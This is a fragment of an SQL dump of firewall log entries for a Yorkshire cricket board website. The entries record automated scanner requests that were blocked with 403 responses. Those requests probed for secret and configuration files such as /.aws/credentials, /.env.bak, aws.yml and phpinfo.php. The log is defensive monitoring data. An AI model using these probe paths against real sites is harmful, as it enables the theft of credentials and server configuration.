ltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogeW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awoK\"}'),(847,1629844850.938062,1629844850.856100,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/.aws/credentials',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly5hd3MvY3JlZGVudGlhbHM=\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC8uYXdzL2NyZWRlbnRpYWxzIEhUVFAvMS4xClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDEKQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0wCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjksZnI7cT0wLjgKVXNlci1BZ2VudDogTW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzYKQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44CkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IHlvcmtzaGlyZWNyaWNrZXRib2FyZC5vcmcudWsKCg==\"}'),(848,1629844849.755150,1629844849.675000,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/info.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2luZm8ucGhw\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9pbmZvLnBocCBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB5b3Jrc2hpcmVjcmlja2V0Ym9hcmQub3JnLnVrCgo=\"}'),(849,1629844848.574832,1629844848.494600,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/.env.bak',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly5lbnYuYmFr\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC8uZW52LmJhayBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB5b3Jrc2hpcmVjcmlja2V0Ym9hcmQub3JnLnVrCgo=\"}'),(850,1629844847.420748,1629844847.340200,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/aws.yml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2F3cy55bWw=\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9hd3MueW1sIEhUVFAvMS4xClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDEKQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0wCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjksZnI7cT0wLjgKVXNlci1BZ2VudDogTW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzYKQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44CkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IHlvcmtzaGlyZWNyaWNrZXRib2FyZC5vcmcudWsKCg==\"}'),(851,1629844846.238743,1629844846.157500,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/phpinfo',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BocGluZm8=\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9waHBpbmZvIEhUVFAvMS4xClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDEKQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0wCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjksZnI7cT0wLjgKVXNlci1BZ2VudDogTW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzYKQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44CkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IHlvcmtzaGlyZWNyaWNrZXRib2FyZC5vcmcudWsKCg==\"}'),(852,1629844844.750106,1629844844.667600,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/phpinfo.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BocGluZm8ucGhw\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9waHBpbmZvLnBocCBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB5b3Jrc2hpcmVjcmlja2V0Ym9hcmQub3JnLnVrCgo=\"}'),(853,1629844843.010683,1629844842.906300,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/_profiler/phpinfo',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L19wcm9maWxlci9waHBpbmZv\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9fcHJvZmlsZXIvcGhwaW5mbyBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB5b3Jrc2hpcmVjcmlja2V0Ym9hcmQub3JnLnVrCgo=\"}'),(854,1629844464.905738,1629844464.826900,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/config.js',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NvbmZpZy5qcw==\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9jb25maWcuanMgSFRUUC8xLjEKVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTAKQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOSxmcjtxPTAuOApVc2VyLUFnZW50OiBNb3psaWxhLzUuMCAoTGludXg7IEFuZHJvaWQgNy4wOyBTTS1HODkyQSBCdWxpZC9OUkQ5ME07IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvNjAuMC4zMTEyLjEwNyBNb2JsaWUgU2FmYXJpLzUzNy4zNgpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogd3d3LnlvcmtzaGlyZWNyaWNrZXRib2FyZC5vcmcudWsKCg==\"}'),(855,1629844463.698683,1629844463.614200,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Lw==\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC8gSFRUUC8xLjEKVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTAKQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOSxmcjtxPTAuOApVc2VyLUFnZW50OiBNb3psaWxhLzUuMCAoTGludXg7IEFuZHJvaWQgNy4wOyBTTS1HODkyQSBCdWxpZC9OUkQ5ME07IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvNjAuMC4zMTEyLjEwNyBNb2JsaWUgU2FmYXJpLzUzNy4zNgpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogd3d3LnlvcmtzaGlyZWNyaWNrZXRib2FyZC5vcmcudWsKCg==\"}'),(856,1629844462.211235,1629844462.102300,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/config/aws.yml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NvbmZpZy9hd3MueW1s\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9jb25maWcvYXdzLnltbCBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB3d3cueW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awoK\"}'),(857,1629844460.794027,1629844460.713200,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Lw==\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC8gSFRUUC8xLjEKVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTAKQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOSxmcjtxPTAuOApVc2VyLUFnZW50OiBNb3psaWxhLzUuMCAoTGludXg7IEFuZHJvaWQgNy4wOyBTTS1HODkyQSBCdWxpZC9OUkQ5ME07IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvNjAuMC4zMTEyLjEwNyBNb2JsaWUgU2FmYXJpLzUzNy4zNgpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogd3d3LnlvcmtzaGlyZWNyaWNrZXRib2FyZC5vcmcudWsKCg==\"}'),(858,1629844459.416321,1629844459.332400,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/.aws/credentials',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly5hd3MvY3JlZGVudGlhbHM=\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC8uYXdzL2NyZWRlbnRpYWxzIEhUVFAvMS4xClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDEKQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0wCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjksZnI7cT0wLjgKVXNlci1BZ2VudDogTW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzYKQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44CkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IHd3dy55b3Jrc2hpcmVjcmlja2V0Ym9hcmQub3JnLnVrCgo=\"}'),(859,1629844457.689112,1629844457.605500,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/info.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2luZm8ucGhw\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9pbmZvLnBocCBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB3d3cueW9ya3NoaXJlY3Jp